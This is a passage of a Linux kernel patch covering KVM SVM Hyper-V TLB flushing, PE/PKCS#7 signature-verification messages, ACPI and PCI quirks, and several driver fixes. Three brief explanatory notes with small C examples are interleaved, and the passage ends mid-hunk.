+@@ -161,7 +163,10 @@ struct __attribute__ ((__packed__)) vmcb_control_area {
+ 	 * Offset 0x3e0, 32 bytes reserved
+ 	 * for use by hypervisor/software.
+ 	 */
+-	u8 reserved_sw[32];
++	union {
++		struct hv_vmcb_enlightenments hv_enlightenments;
++		u8 reserved_sw[32];
++	};
+ };
+ 
+ 
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index ef80d361b4632..10622cf2b30f4 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -33,8 +33,8 @@ static int __init iommu_init_noop(void) { return 0; }
+ static void iommu_shutdown_noop(void) { }
+ bool __init bool_x86_init_noop(void) { return false; }
+ void x86_op_int_noop(int cpu) { }
+-static __init int set_rtc_noop(const struct timespec64 *now) { return -EINVAL; }
+-static __init void get_rtc_noop(struct timespec64 *now) { }
++static int set_rtc_noop(const struct timespec64 *now) { return -EINVAL; }
++static void get_rtc_noop(struct timespec64 *now) { }
+ 
+ static __initconst const struct of_device_id of_cmos_match[] = {
+ 	{ .compatible = "motorola,mc146818" },
+diff --git a/arch/x86/kvm/kvm_onhyperv.h b/arch/x86/kvm/kvm_onhyperv.h
+index 287e98ef9df3d..6272dabec02da 100644
+--- a/arch/x86/kvm/kvm_onhyperv.h
++++ b/arch/x86/kvm/kvm_onhyperv.h
+@@ -12,6 +12,11 @@ int hv_remote_flush_tlb_with_range(struct kvm *kvm,
+ int hv_remote_flush_tlb(struct kvm *kvm);
+ void hv_track_root_tdp(struct kvm_vcpu *vcpu, hpa_t root_tdp);
+ #else /* !CONFIG_HYPERV */
++static inline int hv_remote_flush_tlb(struct kvm *kvm)
++{
++	return -EOPNOTSUPP;
++}
++
+ static inline void hv_track_root_tdp(struct kvm_vcpu *vcpu, hpa_t root_tdp)
+ {
+ }
+diff --git a/arch/x86/kvm/svm/hyperv.h b/arch/x86/kvm/svm/hyperv.h
+index 7d6d97968fb98..c59544cdf03b7 100644
+--- a/arch/x86/kvm/svm/hyperv.h
++++ b/arch/x86/kvm/svm/hyperv.h
+@@ -10,26 +10,4 @@
+ 
+ #include "../hyperv.h"
+ 
+-/*
+- * Hyper-V uses the software reserved 32 bytes in VMCB
+- * control area to expose SVM enlightenments to guests.
+- */
+-struct hv_enlightenments {
+-	struct __packed hv_enlightenments_control {
+-		u32 nested_flush_hypercall:1;
+-		u32 msr_bitmap:1;
+-		u32 enlightened_npt_tlb: 1;
+-		u32 reserved:29;
+-	} __packed hv_enlightenments_control;
+-	u32 hv_vp_id;
+-	u64 hv_vm_id;
+-	u64 partition_assist_page;
+-	u64 reserved;
+-} __packed;
+-
+-/*
+- * Hyper-V uses the software reserved clean bit in VMCB
+- */
+-#define VMCB_HV_NESTED_ENLIGHTENMENTS VMCB_SW
+-
+ #endif /* __ARCH_X86_KVM_SVM_HYPERV_H__ */
+diff --git a/arch/x86/kvm/svm/nested.c b/arch/x86/kvm/svm/nested.c
+index 995bc0f907591..92268645a5fed 100644
+--- a/arch/x86/kvm/svm/nested.c
++++ b/arch/x86/kvm/svm/nested.c
+@@ -179,8 +179,7 @@ void recalc_intercepts(struct vcpu_svm *svm)
+  */
+ static bool nested_svm_vmrun_msrpm(struct vcpu_svm *svm)
+ {
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)svm->nested.ctl.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &svm->nested.ctl.hv_enlightenments;
+ 	int i;
+ 
+ 	/*
+@@ -194,7 +193,7 @@ static bool nested_svm_vmrun_msrpm(struct vcpu_svm *svm)
+ 	if (!svm->nested.force_msr_bitmap_recalc &&
+ 	    kvm_hv_hypercall_enabled(&svm->vcpu) &&
+ 	    hve->hv_enlightenments_control.msr_bitmap &&
+-	    (svm->nested.ctl.clean & BIT(VMCB_HV_NESTED_ENLIGHTENMENTS)))
++	    (svm->nested.ctl.clean & BIT(HV_VMCB_NESTED_ENLIGHTENMENTS)))
+ 		goto set_msrpm_base_pa;
+ 
+ 	if (!(vmcb12_is_intercept(&svm->nested.ctl, INTERCEPT_MSR_PROT)))
+@@ -369,8 +368,8 @@ void __nested_copy_vmcb_control_to_cache(struct kvm_vcpu *vcpu,
+ 	/* Hyper-V extensions (Enlightened VMCB) */
+ 	if (kvm_hv_hypercall_enabled(vcpu)) {
+ 		to->clean = from->clean;
+-		memcpy(to->reserved_sw, from->reserved_sw,
+-		       sizeof(struct hv_enlightenments));
++		memcpy(&to->hv_enlightenments, &from->hv_enlightenments,
++		       sizeof(to->hv_enlightenments));
+ 	}
+ }
+ 
+@@ -1485,7 +1484,7 @@ static void nested_copy_vmcb_cache_to_control(struct vmcb_control_area *dst,
+ 	dst->virt_ext              = from->virt_ext;
+ 	dst->pause_filter_count   = from->pause_filter_count;
+ 	dst->pause_filter_thresh  = from->pause_filter_thresh;
+-	/* 'clean' and 'reserved_sw' are not changed by KVM */
++	/* 'clean' and 'hv_enlightenments' are not changed by KVM */
+ }
+ 
+ static int svm_get_nested_state(struct kvm_vcpu *vcpu,
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 3629dd979667c..9599931c7d572 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -3719,7 +3719,7 @@ static void svm_enable_nmi_window(struct kvm_vcpu *vcpu)
+ 	svm->vmcb->save.rflags |= (X86_EFLAGS_TF | X86_EFLAGS_RF);
+ }
+ 
+-static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
++static void svm_flush_tlb_asid(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 
+@@ -3736,6 +3736,37 @@ static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
+ 		svm->current_vmcb->asid_generation--;
+ }
+ 
++static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
++{
++	hpa_t root_tdp = vcpu->arch.mmu->root.hpa;
++
++	/*
++	 * When running on Hyper-V with EnlightenedNptTlb enabled, explicitly
++	 * flush the NPT mappings via hypercall as flushing the ASID only
++	 * affects virtual to physical mappings, it does not invalidate guest
++	 * physical to host physical mappings.
++	 */
++	if (svm_hv_is_enlightened_tlb_enabled(vcpu) && VALID_PAGE(root_tdp))
++		hyperv_flush_guest_mapping(root_tdp);
++
++	svm_flush_tlb_asid(vcpu);
++}
++
++static void svm_flush_tlb_all(struct kvm_vcpu *vcpu)
++{
++	/*
++	 * When running on Hyper-V with EnlightenedNptTlb enabled, remote TLB
++	 * flushes should be routed to hv_remote_flush_tlb() without requesting
++	 * a "regular" remote flush.  Reaching this point means either there's
++	 * a KVM bug or a prior hv_remote_flush_tlb() call failed, both of
++	 * which might be fatal to the guest.  Yell, but try to recover.
++	 */
++	if (WARN_ON_ONCE(svm_hv_is_enlightened_tlb_enabled(vcpu)))
++		hv_remote_flush_tlb(vcpu->kvm);
++
++	svm_flush_tlb_asid(vcpu);
++}
++
+ static void svm_flush_tlb_gva(struct kvm_vcpu *vcpu, gva_t gva)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+@@ -4733,10 +4764,10 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.set_rflags = svm_set_rflags,
+ 	.get_if_flag = svm_get_if_flag,
+ 
+-	.flush_tlb_all = svm_flush_tlb_current,
++	.flush_tlb_all = svm_flush_tlb_all,
+ 	.flush_tlb_current = svm_flush_tlb_current,
+ 	.flush_tlb_gva = svm_flush_tlb_gva,
+-	.flush_tlb_guest = svm_flush_tlb_current,
++	.flush_tlb_guest = svm_flush_tlb_asid,
+ 
+ 	.vcpu_pre_run = svm_vcpu_pre_run,
+ 	.vcpu_run = svm_vcpu_run,
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index bbc061f3a2b37..d0ed3f5952295 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -151,7 +151,10 @@ struct vmcb_ctrl_area_cached {
+ 	u64 nested_cr3;
+ 	u64 virt_ext;
+ 	u32 clean;
+-	u8 reserved_sw[32];
++	union {
++		struct hv_vmcb_enlightenments hv_enlightenments;
++		u8 reserved_sw[32];
++	};
+ };
+ 
+ struct svm_nested_state {
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.c b/arch/x86/kvm/svm/svm_onhyperv.c
+index 8cdc62c74a964..52c73a8be72b1 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.c
++++ b/arch/x86/kvm/svm/svm_onhyperv.c
+@@ -16,7 +16,7 @@
+ 
+ int svm_hv_enable_direct_tlbflush(struct kvm_vcpu *vcpu)
+ {
+-	struct hv_enlightenments *hve;
++	struct hv_vmcb_enlightenments *hve;
+ 	struct hv_partition_assist_pg **p_hv_pa_pg =
+ 			&to_kvm_hv(vcpu->kvm)->hv_pa_pg;
+ 
+@@ -26,13 +26,13 @@ int svm_hv_enable_direct_tlbflush(struct kvm_vcpu *vcpu)
+ 	if (!*p_hv_pa_pg)
+ 		return -ENOMEM;
+ 
+-	hve = (struct hv_enlightenments *)to_svm(vcpu)->vmcb->control.reserved_sw;
++	hve = &to_svm(vcpu)->vmcb->control.hv_enlightenments;
+ 
+ 	hve->partition_assist_page = __pa(*p_hv_pa_pg);
+ 	hve->hv_vm_id = (unsigned long)vcpu->kvm;
+ 	if (!hve->hv_enlightenments_control.nested_flush_hypercall) {
+ 		hve->hv_enlightenments_control.nested_flush_hypercall = 1;
+-		vmcb_mark_dirty(to_svm(vcpu)->vmcb, VMCB_HV_NESTED_ENLIGHTENMENTS);
++		vmcb_mark_dirty(to_svm(vcpu)->vmcb, HV_VMCB_NESTED_ENLIGHTENMENTS);
+ 	}
+ 
+ 	return 0;
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.h b/arch/x86/kvm/svm/svm_onhyperv.h
+index 4387173576d5e..9a6a34149919c 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.h
++++ b/arch/x86/kvm/svm/svm_onhyperv.h
+@@ -6,6 +6,8 @@
+ #ifndef __ARCH_X86_KVM_SVM_ONHYPERV_H__
+ #define __ARCH_X86_KVM_SVM_ONHYPERV_H__
+ 
++#include <asm/mshyperv.h>
++
+ #if IS_ENABLED(CONFIG_HYPERV)
+ 
+ #include "kvm_onhyperv.h"
+@@ -15,10 +17,20 @@ static struct kvm_x86_ops svm_x86_ops;
+ 
+ int svm_hv_enable_direct_tlbflush(struct kvm_vcpu *vcpu);
+ 
++static inline bool svm_hv_is_enlightened_tlb_enabled(struct kvm_vcpu *vcpu)
++{
++	struct hv_vmcb_enlightenments *hve = &to_svm(vcpu)->vmcb->control.hv_enlightenments;
++
++	return ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB &&
++	       !!hve->hv_enlightenments_control.enlightened_npt_tlb;
++}
++
+ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)vmcb->control.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
++
++	BUILD_BUG_ON(sizeof(vmcb->control.hv_enlightenments) !=
++		     sizeof(vmcb->control.reserved_sw));
+ 
+ 	if (npt_enabled &&
+ 	    ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB)
+@@ -60,27 +72,29 @@ static inline void svm_hv_vmcb_dirty_nested_enlightenments(
+ 		struct kvm_vcpu *vcpu)
+ {
+ 	struct vmcb *vmcb = to_svm(vcpu)->vmcb;
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)vmcb->control.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
+ 
+ 	if (hve->hv_enlightenments_control.msr_bitmap)
+-		vmcb_mark_dirty(vmcb, VMCB_HV_NESTED_ENLIGHTENMENTS);
++		vmcb_mark_dirty(vmcb, HV_VMCB_NESTED_ENLIGHTENMENTS);
+ }
+ 
+-static inline void svm_hv_update_vp_id(struct vmcb *vmcb,
+-		struct kvm_vcpu *vcpu)
++static inline void svm_hv_update_vp_id(struct vmcb *vmcb, struct kvm_vcpu *vcpu)
+ {
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)vmcb->control.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
+ 	u32 vp_index = kvm_hv_get_vpindex(vcpu);
+ 
+ 	if (hve->hv_vp_id != vp_index) {
+ 		hve->hv_vp_id = vp_index;
+-		vmcb_mark_dirty(vmcb, VMCB_HV_NESTED_ENLIGHTENMENTS);
++		vmcb_mark_dirty(vmcb, HV_VMCB_NESTED_ENLIGHTENMENTS);
+ 	}
+ }
+ #else
+ 
++static inline bool svm_hv_is_enlightened_tlb_enabled(struct kvm_vcpu *vcpu)
++{
++	return false;
++}
++
+ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ }
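
The svm.h hunk overlays a typed struct on the VMCB's 32 reserved software bytes, and svm_hv_init_vmcb() gains a BUILD_BUG_ON() so the overlay can never outgrow the reserved area. The C11 equivalent of that compile-time guard, with an illustrative layout:

    #include <stdint.h>
    #include <stdio.h>

    struct enlightenments {
        uint32_t control;
        uint32_t vp_id;
        uint64_t vm_id;
        uint64_t partition_assist_page;
        uint64_t reserved;
    };

    union vmcb_sw_area {
        struct enlightenments hv;
        uint8_t reserved_sw[32];
    };

    /* fails to compile if the struct ever stops matching the reserved bytes */
    _Static_assert(sizeof(struct enlightenments) ==
                   sizeof(((union vmcb_sw_area *)0)->reserved_sw),
                   "enlightenments must exactly fill the reserved area");

    int main(void)
    {
        printf("%zu bytes\n", sizeof(union vmcb_sw_area)); /* 32 */
        return 0;
    }
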
+diff --git a/arch/x86/pci/fixup.c b/arch/x86/pci/fixup.c
+index 615a76d700194..bf5161dcf89e7 100644
+--- a/arch/x86/pci/fixup.c
++++ b/arch/x86/pci/fixup.c
+@@ -7,6 +7,7 @@
+ #include <linux/dmi.h>
+ #include <linux/pci.h>
+ #include <linux/vgaarb.h>
++#include <asm/amd_nb.h>
+ #include <asm/hpet.h>
+ #include <asm/pci_x86.h>
+ 
+@@ -824,3 +825,23 @@ static void rs690_fix_64bit_dma(struct pci_dev *pdev)
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x7910, rs690_fix_64bit_dma);
+ 
+ #endif
++
++#ifdef CONFIG_AMD_NB
++
++#define AMD_15B8_RCC_DEV2_EPF0_STRAP2                                  0x10136008
++#define AMD_15B8_RCC_DEV2_EPF0_STRAP2_NO_SOFT_RESET_DEV2_F0_MASK       0x00000080L
++
++static void quirk_clear_strap_no_soft_reset_dev2_f0(struct pci_dev *dev)
++{
++	u32 data;
++
++	if (!amd_smn_read(0, AMD_15B8_RCC_DEV2_EPF0_STRAP2, &data)) {
++		data &= ~AMD_15B8_RCC_DEV2_EPF0_STRAP2_NO_SOFT_RESET_DEV2_F0_MASK;
++		if (amd_smn_write(0, AMD_15B8_RCC_DEV2_EPF0_STRAP2, data))
++			pci_err(dev, "Failed to write data 0x%x\n", data);
++	} else {
++		pci_err(dev, "Failed to read data\n");
++	}
++}
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_AMD, 0x15b8, quirk_clear_strap_no_soft_reset_dev2_f0);
++#endif
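
The quirk above is a read-modify-write over a side-band register: read, clear one strap bit, write back, and report whichever step failed. A generic sketch against a fake register (all names invented):

    #include <stdio.h>
    #include <stdint.h>

    #define NO_SOFT_RESET_MASK 0x00000080u

    static uint32_t fake_reg = 0xffffffffu;

    /* both accessors return 0 on success, mirroring the pattern above */
    static int reg_read(uint32_t *val) { *val = fake_reg; return 0; }
    static int reg_write(uint32_t val) { fake_reg = val;  return 0; }

    int main(void)
    {
        uint32_t data;

        if (!reg_read(&data)) {
            data &= ~NO_SOFT_RESET_MASK;      /* clear only the strap bit */
            if (reg_write(data))
                fprintf(stderr, "write failed\n");
        } else {
            fprintf(stderr, "read failed\n");
        }
        printf("reg=%#x\n", fake_reg);        /* 0xffffff7f */
        return 0;
    }
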
+diff --git a/crypto/asymmetric_keys/pkcs7_verify.c b/crypto/asymmetric_keys/pkcs7_verify.c
+index f6321c785714c..3da32813e4412 100644
+--- a/crypto/asymmetric_keys/pkcs7_verify.c
++++ b/crypto/asymmetric_keys/pkcs7_verify.c
+@@ -79,16 +79,16 @@ static int pkcs7_digest(struct pkcs7_message *pkcs7,
+ 		}
+ 
+ 		if (sinfo->msgdigest_len != sig->digest_size) {
+-			pr_debug("Sig %u: Invalid digest size (%u)\n",
+-				 sinfo->index, sinfo->msgdigest_len);
++			pr_warn("Sig %u: Invalid digest size (%u)\n",
++				sinfo->index, sinfo->msgdigest_len);
+ 			ret = -EBADMSG;
+ 			goto error;
+ 		}
+ 
+ 		if (memcmp(sig->digest, sinfo->msgdigest,
+ 			   sinfo->msgdigest_len) != 0) {
+-			pr_debug("Sig %u: Message digest doesn't match\n",
+-				 sinfo->index);
++			pr_warn("Sig %u: Message digest doesn't match\n",
++				sinfo->index);
+ 			ret = -EKEYREJECTED;
+ 			goto error;
+ 		}
+@@ -478,7 +478,7 @@ int pkcs7_supply_detached_data(struct pkcs7_message *pkcs7,
+ 			       const void *data, size_t datalen)
+ {
+ 	if (pkcs7->data) {
+-		pr_debug("Data already supplied\n");
++		pr_warn("Data already supplied\n");
+ 		return -EINVAL;
+ 	}
+ 	pkcs7->data = data;
+diff --git a/crypto/asymmetric_keys/verify_pefile.c b/crypto/asymmetric_keys/verify_pefile.c
+index 7553ab18db898..22beaf2213a22 100644
+--- a/crypto/asymmetric_keys/verify_pefile.c
++++ b/crypto/asymmetric_keys/verify_pefile.c
+@@ -74,7 +74,7 @@ static int pefile_parse_binary(const void *pebuf, unsigned int pelen,
+ 		break;
+ 
+ 	default:
+-		pr_debug("Unknown PEOPT magic = %04hx\n", pe32->magic);
++		pr_warn("Unknown PEOPT magic = %04hx\n", pe32->magic);
+ 		return -ELIBBAD;
+ 	}
+ 
+@@ -95,7 +95,7 @@ static int pefile_parse_binary(const void *pebuf, unsigned int pelen,
+ 	ctx->certs_size = ddir->certs.size;
+ 
+ 	if (!ddir->certs.virtual_address || !ddir->certs.size) {
+-		pr_debug("Unsigned PE binary\n");
++		pr_warn("Unsigned PE binary\n");
+ 		return -ENODATA;
+ 	}
+ 
+@@ -127,7 +127,7 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	unsigned len;
+ 
+ 	if (ctx->sig_len < sizeof(wrapper)) {
+-		pr_debug("Signature wrapper too short\n");
++		pr_warn("Signature wrapper too short\n");
+ 		return -ELIBBAD;
+ 	}
+ 
+@@ -135,19 +135,23 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	pr_debug("sig wrapper = { %x, %x, %x }\n",
+ 		 wrapper.length, wrapper.revision, wrapper.cert_type);
+ 
+-	/* Both pesign and sbsign round up the length of certificate table
+-	 * (in optional header data directories) to 8 byte alignment.
++	/* sbsign rounds up the length of certificate table (in optional
++	 * header data directories) to 8 byte alignment.  However, the PE
++	 * specification states that while entries are 8-byte aligned, this is
++	 * not included in their length, and as a result, pesign has not
++	 * rounded up since 0.110.
+ 	 */
+-	if (round_up(wrapper.length, 8) != ctx->sig_len) {
+-		pr_debug("Signature wrapper len wrong\n");
++	if (wrapper.length > ctx->sig_len) {
++		pr_warn("Signature wrapper bigger than sig len (%x > %x)\n",
++			ctx->sig_len, wrapper.length);
+ 		return -ELIBBAD;
+ 	}
+ 	if (wrapper.revision != WIN_CERT_REVISION_2_0) {
+-		pr_debug("Signature is not revision 2.0\n");
++		pr_warn("Signature is not revision 2.0\n");
+ 		return -ENOTSUPP;
+ 	}
+ 	if (wrapper.cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA) {
+-		pr_debug("Signature certificate type is not PKCS\n");
++		pr_warn("Signature certificate type is not PKCS\n");
+ 		return -ENOTSUPP;
+ 	}
+ 
+@@ -160,7 +164,7 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	ctx->sig_offset += sizeof(wrapper);
+ 	ctx->sig_len -= sizeof(wrapper);
+ 	if (ctx->sig_len < 4) {
+-		pr_debug("Signature data missing\n");
++		pr_warn("Signature data missing\n");
+ 		return -EKEYREJECTED;
+ 	}
+ 
+@@ -194,7 +198,7 @@ check_len:
+ 		return 0;
+ 	}
+ not_pkcs7:
+-	pr_debug("Signature data not PKCS#7\n");
++	pr_warn("Signature data not PKCS#7\n");
+ 	return -ELIBBAD;
+ }
+ 
+@@ -337,8 +341,8 @@ static int pefile_digest_pe(const void *pebuf, unsigned int pelen,
+ 	digest_size = crypto_shash_digestsize(tfm);
+ 
+ 	if (digest_size != ctx->digest_len) {
+-		pr_debug("Digest size mismatch (%zx != %x)\n",
+-			 digest_size, ctx->digest_len);
++		pr_warn("Digest size mismatch (%zx != %x)\n",
++			digest_size, ctx->digest_len);
+ 		ret = -EBADMSG;
+ 		goto error_no_desc;
+ 	}
+@@ -369,7 +373,7 @@ static int pefile_digest_pe(const void *pebuf, unsigned int pelen,
+ 	 * PKCS#7 certificate.
+ 	 */
+ 	if (memcmp(digest, ctx->digest, ctx->digest_len) != 0) {
+-		pr_debug("Digest mismatch\n");
++		pr_warn("Digest mismatch\n");
+ 		ret = -EKEYREJECTED;
+ 	} else {
+ 		pr_debug("The digests match!\n");
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index a222bda7e15b0..d08818baea88f 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -400,6 +400,13 @@ static const struct dmi_system_id medion_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "M17T"),
+ 		},
+ 	},
++	{
++		.ident = "MEDION S17413",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "MEDION"),
++			DMI_MATCH(DMI_BOARD_NAME, "M1xA"),
++		},
++	},
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 42b5af5490a11..f0f41959faea6 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -530,6 +530,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Precision 7510"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Acer Aspire 3830TG */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Aspire 3830TG"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Acer Aspire 4810T */
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 2ed994a313a91..c0cbc5f3eb266 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1571,17 +1571,18 @@ static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
+ 		set_bit(GD_SUPPRESS_PART_SCAN, &disk->state);
+ 
+ 	get_device(&ub->cdev_dev);
++	ub->dev_info.state = UBLK_S_DEV_LIVE;
+ 	ret = add_disk(disk);
+ 	if (ret) {
+ 		/*
+ 		 * Has to drop the reference since ->free_disk won't be
+ 		 * called in case of add_disk failure.
+ 		 */
++		ub->dev_info.state = UBLK_S_DEV_DEAD;
+ 		ublk_put_device(ub);
+ 		goto out_put_disk;
+ 	}
+ 	set_bit(UB_STATE_USED, &ub->state);
+-	ub->dev_info.state = UBLK_S_DEV_LIVE;
+ out_put_disk:
+ 	if (ret)
+ 		put_disk(disk);
+diff --git a/drivers/bluetooth/btbcm.c b/drivers/bluetooth/btbcm.c
+index 3006e2a0f37e1..43e98a598bd9a 100644
+--- a/drivers/bluetooth/btbcm.c
++++ b/drivers/bluetooth/btbcm.c
+@@ -511,7 +511,7 @@ static const char *btbcm_get_board_name(struct device *dev)
+ 	len = strlen(tmp) + 1;
+ 	board_type = devm_kzalloc(dev, len, GFP_KERNEL);
+ 	strscpy(board_type, tmp, len);
+-	for (i = 0; i < board_type[i]; i++) {
++	for (i = 0; i < len; i++) {
+ 		if (board_type[i] == '/')
+ 			board_type[i] = '-';
+ 	}
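
The btbcm fix bounds the sanitizing loop by the string length instead of by the byte values it happens to be scanning ("i < board_type[i]"). A stand-alone version of the corrected loop:

    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        char board[] = "apple,bcm/4377";
        size_t len = strlen(board) + 1;

        for (size_t i = 0; i < len; i++) { /* bound by length, not contents */
            if (board[i] == '/')
                board[i] = '-';
        }
        printf("%s\n", board);             /* apple,bcm-4377 */
        return 0;
    }
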
+diff --git a/drivers/clk/clk-renesas-pcie.c b/drivers/clk/clk-renesas-pcie.c
+index e6247141d0c05..3e98a16eba6bb 100644
+--- a/drivers/clk/clk-renesas-pcie.c
++++ b/drivers/clk/clk-renesas-pcie.c
+@@ -144,8 +144,9 @@ static int rs9_regmap_i2c_read(void *context,
+ static const struct regmap_config rs9_regmap_config = {
+ 	.reg_bits = 8,
+ 	.val_bits = 8,
+-	.cache_type = REGCACHE_NONE,
++	.cache_type = REGCACHE_FLAT,
+ 	.max_register = RS9_REG_BCP,
++	.num_reg_defaults_raw = 0x8,
+ 	.rd_table = &rs9_readable_table,
+ 	.wr_table = &rs9_writeable_table,
+ 	.reg_write = rs9_regmap_i2c_write,
+diff --git a/drivers/clk/sprd/common.c b/drivers/clk/sprd/common.c
+index ce81e4087a8fc..2bfbab8db94bf 100644
+--- a/drivers/clk/sprd/common.c
++++ b/drivers/clk/sprd/common.c
+@@ -17,7 +17,6 @@ static const struct regmap_config sprdclk_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0xffff,
+ 	.fast_io	= true,
+ };
+ 
+@@ -43,6 +42,8 @@ int sprd_clk_regmap_init(struct platform_device *pdev,
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *node = dev->of_node, *np;
+ 	struct regmap *regmap;
++	struct resource *res;
++	struct regmap_config reg_config = sprdclk_regmap_config;
+ 
+ 	if (of_find_property(node, "sprd,syscon", NULL)) {
+ 		regmap = syscon_regmap_lookup_by_phandle(node, "sprd,syscon");
+@@ -59,12 +60,14 @@ int sprd_clk_regmap_init(struct platform_device *pdev,
+ 			return PTR_ERR(regmap);
+ 		}
+ 	} else {
+-		base = devm_platform_ioremap_resource(pdev, 0);
++		base = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 		if (IS_ERR(base))
+ 			return PTR_ERR(base);
+ 
++		reg_config.max_register = resource_size(res) - reg_config.reg_stride;
++
+ 		regmap = devm_regmap_init_mmio(&pdev->dev, base,
+-					       &sprdclk_regmap_config);
++					       &reg_config);
+ 		if (IS_ERR(regmap)) {
+ 			pr_err("failed to init regmap\n");
+ 			return PTR_ERR(regmap);
+diff --git a/drivers/dma/apple-admac.c b/drivers/dma/apple-admac.c
+index 90f28bda29c8b..4cf8da77bdd91 100644
+--- a/drivers/dma/apple-admac.c
++++ b/drivers/dma/apple-admac.c
+@@ -75,6 +75,7 @@
+ 
+ #define REG_TX_INTSTATE(idx)		(0x0030 + (idx) * 4)
+ #define REG_RX_INTSTATE(idx)		(0x0040 + (idx) * 4)
++#define REG_GLOBAL_INTSTATE(idx)	(0x0050 + (idx) * 4)
+ #define REG_CHAN_INTSTATUS(ch, idx)	(0x8010 + (ch) * 0x200 + (idx) * 4)
+ #define REG_CHAN_INTMASK(ch, idx)	(0x8020 + (ch) * 0x200 + (idx) * 4)
+ 
+@@ -511,7 +512,10 @@ static int admac_terminate_all(struct dma_chan *chan)
+ 	admac_stop_chan(adchan);
+ 	admac_reset_rings(adchan);
+ 
+-	adchan->current_tx = NULL;
++	if (adchan->current_tx) {
++		list_add_tail(&adchan->current_tx->node, &adchan->to_free);
++		adchan->current_tx = NULL;
++	}
+ 	/*
+ 	 * Descriptors can only be freed after the tasklet
+ 	 * has been killed (in admac_synchronize).
+@@ -672,13 +676,14 @@ static void admac_handle_chan_int(struct admac_data *ad, int no)
+ static irqreturn_t admac_interrupt(int irq, void *devid)
+ {
+ 	struct admac_data *ad = devid;
+-	u32 rx_intstate, tx_intstate;
++	u32 rx_intstate, tx_intstate, global_intstate;
+ 	int i;
+ 
+ 	rx_intstate = readl_relaxed(ad->base + REG_RX_INTSTATE(ad->irq_index));
+ 	tx_intstate = readl_relaxed(ad->base + REG_TX_INTSTATE(ad->irq_index));
++	global_intstate = readl_relaxed(ad->base + REG_GLOBAL_INTSTATE(ad->irq_index));
+ 
+-	if (!tx_intstate && !rx_intstate)
++	if (!tx_intstate && !rx_intstate && !global_intstate)
+ 		return IRQ_NONE;
+ 
+ 	for (i = 0; i < ad->nchannels; i += 2) {
+@@ -693,6 +698,12 @@ static irqreturn_t admac_interrupt(int irq, void *devid)
+ 		rx_intstate >>= 1;
+ 	}
+ 
++	if (global_intstate) {
++		dev_warn(ad->dev, "clearing unknown global interrupt flag: %x\n",
++			 global_intstate);
++		writel_relaxed(~(u32) 0, ad->base + REG_GLOBAL_INTSTATE(ad->irq_index));
++	}
++
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -850,6 +861,9 @@ static int admac_probe(struct platform_device *pdev)
+ 
+ 	dma->directions = BIT(DMA_MEM_TO_DEV) | BIT(DMA_DEV_TO_MEM);
+ 	dma->residue_granularity = DMA_RESIDUE_GRANULARITY_BURST;
++	dma->src_addr_widths = BIT(DMA_SLAVE_BUSWIDTH_1_BYTE) |
++			BIT(DMA_SLAVE_BUSWIDTH_2_BYTES) |
